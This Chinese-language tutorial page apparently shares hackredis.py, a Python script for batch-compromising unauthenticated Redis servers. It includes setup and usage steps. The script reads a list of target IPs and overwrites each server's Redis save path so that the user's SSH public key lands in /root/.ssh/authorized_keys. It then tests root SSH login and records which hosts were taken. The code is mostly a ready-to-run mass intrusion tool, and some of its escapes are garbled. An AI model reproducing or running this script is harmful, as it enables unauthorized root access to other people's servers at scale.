前言
本文主要給大家介紹了關(guān)于redis未授權(quán)批量提權(quán)的相關(guān)內(nèi)容,分享出來供大家參考學(xué)習(xí),下面話不多說了,來一起看看詳細(xì)的介紹吧。
安裝依賴
sudo easy_install redis
使用
redis python hackredis.py usage: hackredis.py [-h] [-l IPLIST] [-p PORT] [-r ID_RSAFILE] [-sp SSH_PORT]For Example:-----------------------------------------------------------------------------python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22optional arguments: -h, --help show this help message and exit -l IPLIST the hosts of target -p PORT the redis default port -r ID_RSAFILE the ssh id_rsa file you generate -sp SSH_PORT the ssh port
首先需要ssh密鑰:
ssh-keygen -t rsa cp ~/.ssh/id_rsa.pub /tmp/foo.txt
之后將ip列表填入ip.txt,然后就可以跑了。 成功的將會(huì)輸出到success.txt,執(zhí)行成功但是ssh連接失敗的會(huì)存儲(chǔ)在unconnect.txt,操作失敗的會(huì)存儲(chǔ)在fail.txt。
#!/usr/bin/python#coding:utf-8############################################################### @file hackredis.py #### @date 2015-12-11 #### @author evi1cg ###############################################################import redisimport argparseimport textwrapimport sysimport pexpectdef getargs(): parser = argparse.ArgumentParser(prog='hackredis.py', formatter_class=argparse.RawTextHelpFormatter, description=textwrap.dedent('''/ For Example: ----------------------------------------------------------------------------- python hackredis.py -l ip.txt -p 6379 -r foo.txt -sp 22''')) parser.add_argument('-l', dest='iplist', type=str, help='the hosts of target') parser.add_argument('-p', dest='port', default=6379, type=int, help='the redis default port') parser.add_argument('-r', dest='id_rsafile', type=str, help='the ssh id_rsa file you generate') parser.add_argument('-sp', dest='ssh_port', type=int,default=22, help='the ssh port') if(len(sys.argv[1:]) / 2 != 4): sys.argv.append('-h') return parser.parse_args()def hackredis(host,port): ck = 0 try: print "[*] Attacking ip:%s"%host r =redis.StrictRedis(host=host,port=port,db=0,socket_timeout=2) r.flushall r.set('crackit',foo) r.config_set('dir','/root/.ssh/') r.config_set('dbfilename','authorized_keys') r.save() ck =1 except: print "/033[1;31;40m[-]/033[0m Something wrong with %s"%host write(host,2) ck =0 if ck == 1: check(host) else: passdef check(host): print '/033[1;33;40m[*]/033[0m Check connecting... ' try: ssh = pexpect.spawn('ssh root@%s -p %d' %(host,ssh_port)) i = ssh.expect('[#/$]',timeout=2) if i == 0: print "/033[1;34;40m[+]/033[0m Success !" write(host,1) else: pass except: print "/033[1;32;40m[-]/033[0m Failed to connect !" write(host,3)def write(host,suc): if suc == 1: filesname = 'success.txt' elif suc ==2: filesname = 'fail.txt' elif suc ==3: filesname = 'unconnect.txt' else: pass file_object = open(filesname,'a') file_object.write(host+'/n') file_object.close()def main(): global foo,ssh_port paramsargs = getargs() try: hosts = open(paramsargs.iplist,"r") except(IOError): print "Error: Check your hostfile path/n" sys.exit(1) port = paramsargs.port ssh_port = paramsargs.ssh_port try: foo = '/n/n/n'+open(paramsargs.id_rsafile,"r").readline()+'/n/n/n' except(IOError): print "Error: Check your wordlist path/n" sys.exit(1) ips = [p.replace('/n','') for p in hosts] for ip in ips: hackredis(ip.strip(),port)if __name__ == "__main__": main()總結(jié)
以上就是這篇文章的全部?jī)?nèi)容了,希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來一定的幫助,如果有疑問大家可以留言交流,謝謝大家對(duì)武林網(wǎng)的支持。
新聞熱點(diǎn)
疑難解答
圖片精選
